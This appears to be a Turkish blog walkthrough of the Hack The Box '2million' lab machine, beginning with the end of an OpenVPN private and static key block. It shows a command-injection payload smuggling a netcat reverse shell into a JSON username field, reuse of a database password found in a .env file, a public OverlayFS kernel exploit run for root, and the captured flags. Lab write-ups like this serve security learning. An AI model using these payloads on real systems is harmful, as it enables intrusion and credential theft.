AjLxmL4yDjQ3KlUFPfDi4zm+Zc+pPoZL/0vh8PyeJGhfQND87evEvbqNCscKLgBJ
csKFpcdPkuOb+U1cgqcBA3Q=
-----END PRIVATE KEY-----
</key>
<tls-auth>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
45df64cdd950c711636abdb1f78c058c
358730b4f3bcb119b03e43c46a856444
05e96eaed55755e3eef41cd21538d041
079c0fc8312517d851195139eceb458b
f8ff28ba7d46ef9ce65f13e0e259e5e3
068a47535cd80980483a64d16b7d10ca
574bb34c7ad1490ca61d1f45e5987e26
7952930b85327879cc0333bb96999abe
2d30e4b592890149836d0f1eacd2cb8c
a67776f332ec962bc22051deb9a94a78
2b51bafe2da61c3dc68bbdd39fa35633
e511535e57174665a2495df74f186a83
479944660ba924c91dd9b00f61bc09f5
2fe7039aa114309111580bc5c910b4ac
c9efb55a3f0853e4b6244e3939972ff6
bfd36c19a809981c06a91882b6800549
-----END OpenVPN Static key V1-----
</tls-auth>

Bu araştırmalrım üzerine RCE tespit ettim.

┌──(root㉿kali)-[/tmp/10.10.11.221]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.221 - - [05/Aug/2023 12:34:26] "GET / HTTP/1.1" 200 -
10.10.11.221 - - [05/Aug/2023 12:34:27] code 404, message File not found
10.10.11.221 - - [05/Aug/2023 12:34:27] "GET /.ovpn HTTP/1.1" 404 -

Görüldüğü üzere komut çalıştırabilmekteyiz. Bunun üzerine reverse shell aldım.

POST /api/v1/admin/vpn/generate HTTP/1.1
    Host: 2million.htb
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4
    Connection: close
    Content-Length: 40
    Content-Type: application/json

    {"username":"admin; rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.36 443 >/tmp/f"}
┌──(root㉿kali)-[/tmp/10.10.11.221]
└─# nc -lvp 443
listening on [any] 443 ...
connect to [10.10.14.36] from 2million.htb [10.10.11.221] 33800
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 

İçeride enum yaptıktan sonra bir .env dosyası buldumv eo rada db parolası vardı bu parolayı admin kullanıcısı için denediğimde yetki yüksletebildim.


$ ls
total 56
drwxr-xr-x 10 root root 4096 Aug  5 16:40 .
drwxr-xr-x  3 root root 4096 Jun  6 10:22 ..
-rw-r--r--  1 root root   87 Jun  2 18:56 .env
-rw-r--r--  1 root root 1237 Jun  2 16:15 Database.php
-rw-r--r--  1 root root 2787 Jun  2 16:15 Router.php
drwxr-xr-x  5 root root 4096 Aug  5 16:40 VPN
drwxr-xr-x  2 root root 4096 Jun  6 10:22 assets
drwxr-xr-x  2 root root 4096 Jun  6 10:22 controllers
drwxr-xr-x  5 root root 4096 Jun  6 10:22 css
drwxr-xr-x  2 root root 4096 Jun  6 10:22 fonts
drwxr-xr-x  2 root root 4096 Jun  6 10:22 images
-rw-r--r--  1 root root 2692 Jun  2 18:57 index.php
drwxr-xr-x  3 root root 4096 Jun  6 10:22 js
drwxr-xr-x  2 root root 4096 Jun  6 10:22 views
$ cat .enc
cat: .enc: No such file or directory
$ cat .env
DB_HOST=127.0.0.1
DB_DATABASE=htb_prod
DB_USERNAME=admin
DB_PASSWORD=SuperDuperPass123

$ su admin
Password: SuperDuperPass123
id
uid=1000(admin) gid=1000(admin) groups=1000(admin)

Bunun üzerine artık ssh ile devam ettim.


┌──(root㉿kali)-[/tmp/10.10.11.221]
└─# ssh [email protected]
The authenticity of host '10.10.11.221 (10.10.11.221)' can't be established.
ED25519 key fingerprint is SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.221' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.70-051570-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Aug  5 04:44:28 PM UTC 2023

  System load:           0.73876953125
  Usage of /:            90.4% of 4.82GB
  Memory usage:          14%
  Swap usage:            0%
  Processes:             225
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.221
  IPv6 address for eth0: dead:beef::250:56ff:feb9:4c06

  => / is using 90.4% of 4.82GB

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

You have mail.
Last login: Fri Aug  4 22:27:34 2023 from 10.10.16.18
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@2million:~$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
admin@2million:~$ ls
user.txt
admin@2million:~$ cat user.txt
c5a38bb4ab887ac5fda62a4f1984ab23

İlk flagi aldıkan sonra msfconsole'un post modülündeki exploit suggesterı denedim 3 adet exploit buldu ancak bunlar başarılı olmadı. Daha sonrasın linpeas çıktısını inceledim. mail'lerin olduğunu söylüyordu. Bunun üzerine aşağıdaki maili buldum.

admin@2million:/var/mail$ cat admin 
From: ch4p <[email protected]>
To: admin <[email protected]>
Cc: g0blin <[email protected]>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <[email protected]>
X-Mailer: ThunderMail Pro 5.2

Hey admin,

I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.

İlgili zafiyeti araştırdığımda https://github.com/xkaneiki/CVE-2023-0386/tree/main adresinde yayınlanmış bir exploit buldum.

Exploit denendikten sonra root olabildim

admin@2million:/tmp/CVE-2023-0386$ ls
exp  exp.c  fuse  fuse.c  gc  getshell.c  Makefile  ovlcap  README.md  test
admin@2million:/tmp/CVE-2023-0386$ ./fuse ./ovlcap/lower ./gc
[+] len of gc: 0x3ee0
[+] readdir
[+] getattr_callback
/file
[+] open_callback
/file
[+] read buf callback
offset 0
size 16384
path /file
[+] open_callback
/file
[+] open_callback
/file
[+] ioctl callback
path /file
cmd 0x80086601
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
admin@2million:/tmp/CVE-2023-0386$ ./exp
uid:1000 gid:1000
[+] mount success
total 8
drwxrwxr-x 1 root   root     4096 Aug  6 11:42 .
drwxr-xr-x 6 root   root     4096 Aug  6 11:42 ..
-rwsrwxrwx 1 nobody nogroup 16096 Jan  1  1970 file
[+] exploit success!
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@2million:/tmp/CVE-2023-0386# id
uid=0(root) gid=0(root) groups=0(root),1000(admin)
root@2million:/tmp/CVE-2023-0386# cd /root/
root@2million:/root# ls
root.txt  snap  thank_you.json
root@2million:/root# cat root.txt 
0f9bb91b0f5fd004d30cae659f9bf093
root@2million:/root# 
Kategori:Walkthrough

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir